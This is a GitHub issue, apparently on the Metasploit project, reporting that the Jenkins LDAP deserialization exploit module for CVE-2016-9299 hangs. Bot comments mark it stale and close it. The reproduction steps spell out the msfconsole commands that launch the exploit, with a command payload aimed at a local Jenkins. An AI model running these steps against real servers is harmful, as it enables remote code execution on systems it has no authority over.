Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

About CVE-2016-9299 #15568

Closed
The-Ga opened this issue Aug 18, 2021 · 2 comments
Closed

About CVE-2016-9299 #15568

The-Ga opened this issue Aug 18, 2021 · 2 comments
Labels
bug Stale Marks an issue as stale, to be closed if no action is taken

Comments

@The-Ga
Copy link

The-Ga commented Aug 18, 2021

Steps to reproduce

How'd you do it?

  1. java -jar jenkins.war
  2. msfconsole
  3. use exploit/linux/misc/jenkins_ldap_deserialize
  4. set RHOST 127.0.0.1
  5. set PAYLOAD cmd/unix/generic
  6. set CMD 'touch /tmp/wtf'
  7. run

Were you following a specific guide/tutorial or reading documentation?

#7815

Expected behavior

What should happen?
[*] Exploit completed, but no session was created.

Current behavior

What happens instead?
Stuck during "run"

Metasploit version

Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).
Framework: 6.0.45-dev
Console : 6.0.45-dev
11

@The-Ga The-Ga added the bug label Aug 18, 2021
@github-actions
Copy link

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Sep 17, 2021
@github-actions
Copy link

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Stale Marks an issue as stale, to be closed if no action is taken
Projects
None yet
Development

No branches or pull requests

1 participant